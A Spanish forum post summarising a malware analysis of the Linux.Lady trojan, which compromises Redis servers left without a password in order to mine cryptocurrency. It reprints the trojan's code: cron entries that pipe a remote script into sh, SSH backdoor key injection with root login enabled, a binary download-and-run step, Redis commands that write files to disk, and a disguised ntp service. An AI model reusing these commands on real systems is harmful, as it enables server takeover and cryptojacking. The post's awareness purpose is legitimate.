Troyano Linux.Lady: Usa los servidores para minar Bitcoins (Pagina 1) / El mundo de las distribuciones GNU-Linux / Foro Wifi-libre.com

El libre pensamiento para un internet libre

No estas registrado.     

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#1 12-08-2016 21:44:03

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,497

Troyano Linux.Lady: Usa los servidores para minar Bitcoins

Se ha detectado un troyano llamado Linux.Lady diseñado contra los servidores que usan por defecto Redis NoSQL

Ladylinux_1.jpg

  Hay tan pocos troyanos para Linux que es casi todo un evento cuando sale uno. big_smile
El problema para ellos es que no pasan desaparecidos mucho tiempo: No es fácil esconderse en un código abierto.
  Los de Doctorweb acaban de publicar un reporte sobre uno de estos bichos raros pillado en acción que responde al nombre de Linux.Lady

  Es un malware que afecta a las distribuciones Linux para servidores
Explota la "ignorancia" (o falta de atención) de los administradores lo más descuidados (o ignorantes): Compromete los sistemas que emplean Redis NoSQL por defecto y que no tienen una contraseña habilitada/configurada para limitar el uso este programa.

A pesar de que "proteger con contraseña" sea la base de este oficio y la piedra angular de la seguridad, se estima que podría haber hasta 30 000 servidores vulnerables.
  Parte de la responsabilidad cae en los hombros de  VMware y Pivotal (los que lanzaron Redis) por proponer une configuración por defecto insegura.
Los datos SQL son un tesoro a proteger.
  Redis se promociona como siendo "liviano y rápido"
Es justamente por falta de proceso de identificación que logra estos aparentes buenos resultados...  tongue
Sacrificar la seguridad para engañar a los más bobos no está bien...

  Hay que reconocer que nuestra Linux.Lady tiene clase.
No es un virus destructivo a lo tonto sino un parásito que sabe encontrar el equilibrio entre chupar los recursos de su huésped y dejarlo vivo.
   Con capacidad a propagarse.
  Sus principales características son

  1. Recoge información sobre la maquina infectada y la manda al servidor de control remoto

  2. Descarga y instala en la maquina infectada un programa de criptografía

  3. Ataca los otros ordenadores de la red para auto-replicarse

  En resumen es un malware que crea un parque de zombis dedicados a "minar Bit Coins"

  El troyano crea un ejecutable /usr/sbin/ntp y un fichero de configuración /etc/systemd/system/ntp.service que tiene esta pinta:

[Unit]
Description=NTP daemon
ConditionFileIsExecutable=/usr/sbin/ntp
[Service]
StartLimitInterval=5
StartLimitBurst=10
ExecStart=/usr/sbin/ntp "-D"
Restart=always
RestartSec=120
[Install]
WantedBy=multi-user.target

 
  Una vez cómodamente instalada; La Linux.Lady empieza su labor y crea cuatros canales.
Manda al servidor remoto información sobre la maquina infectada:

  • Versión de Lady.Linux

  • Cuantas CPU tiene la maquina infectada

  • nombre del huésped

  • Cuantos procesos están corriendo

  • nombre del Sistema Operativo

  • A que "familia" pertenece el sistema operativo

  • Tiempo de actividad el huésped

  A cambio de esto recibe un fichero de configuración a medida para entrar en acción: Descargar, instalar y ejecutar un programa de criptografía (escrito en lenguaje go) para minar BitCoins.
  Determina una IP externa para establecer una conexión directa hacía el servidor del atacante usando el puerto 6379 sin autenticarse (es el puerto que usa Redis)
  Si consigue contactar con el servidor descarga desde la url del fichero de configuración un script ( Linux.DownLoader.196,) que instala en el cron scheduler (planificación de procesos/rutinas programadas)
  Esto es lo que hace nuestra "Lady"

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/10 * * * * curl -fsSL http://r.*****ring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r. *****ring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
    mkdir -p ~/.ssh
    rm -f ~/.ssh/authorized_keys*
    echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
    echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
    echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
    echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
    echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
    /etc/init.d/sshd restart
fi
if [ ! -f "/etc/init.d/ntp" ]; then
    if [ ! -f "/etc/systemd/system/ntp.service" ]; then
        mkdir -p /opt
        curl -fsSL http://r. ****ring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -Install
    fi
fi
/etc/init.d/ntp start
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9

Una vez la conexión establecida el troyano ejecuta estas ordenes

config set stop-writes-on-bgsave-error no
config set rdbcompression no
config set dir /var/spool/cron
config set dbfilename root
set 1 ("\n\n*/1 * * * * curl -L %s | sh\n\n") % (ShellUrl из конфига)
save
config set dir /root/.ssh
config set dbfilename authorized_keys
set 1 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA4TjWxZeA8JlaBwfvgtjvDT0bm9d4JGbzz1KIIGyvSKxd7bqYLwXfxr0Q+tZxF5nHXldH2pRNacD7Gm8XX4aZCUYlL5Ev0goYmOTgXOQNkgyVQKPE6KGV5BZpNoB2sbIkuweLbbdZaOcncnFvAEh7dVUQ5lh2QLz/IuRzakrzaJeTPiaD3BAyXhjcVwDFn1Lb84uiqc7nW6gw2bIaSMOrNTfZH/xftGdI'UpJoQK06jmFrTlpWaL5joAooc2Evan6XnqkO4g5In7tjhX8pBtCBGk78SKCJmkEjK'+xbN+7oZhuaeB/ubPm3xDahi+w1xHGZIt/N7z268Fz3rQAhBUZ+eQ==
save
del 1
set dir /tmp
set dbfilename dump.rdb
config set rdbcompression yes

  Incluyendo así una llave SSH valida para conectarse mediante este protocolo desde el sistema huésped hacia el servidor remoto.
  La maquina infectada ejecutará por SSH y con esta llave

(curl -fsSL %s?ssh | sh) % (ShellUrl)

   Para instalar el programa para minar Bit Coins
  Se trata de un conjunto de librerías "Go" alojadas en GitHub
   Podéis ver aquí su arborescencia (No se ve muy bien, lo siento, así es la captura que pusieron)

Ladylinux_2.jpg

Más lectura

Conectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

Temas similares

Tema Respuestas Vistas Ultimo mensaje
23 3659 Hoy 13:19:58 por v1s1t0r
0 34 Ayer 22:52:08 por josep345
44 9069 Ayer 16:20:37 por ferdimam
Pegado:
262 40363 Ayer 13:33:32 por kcdtv
Pegado:
Pegado:: Hostbase 1.0 released por Koala  [ 1 2 3 7 ]
167 6647 Ayer 12:41:37 por Koala

Pie de página

Información del usuario

Ultimo usuario registrado: Vidor
Usuarios registrados conectados: 2
Invitados conectados: 10

Conectados: cristi_28 kcdtv

Estadisticas de los foros

Número total de usuarios registrados: 796
Número total de temas: 937
Número total de mensajes: 8,212

Máx. usuarios conectados: 69 el 15-10-2017 09:23:21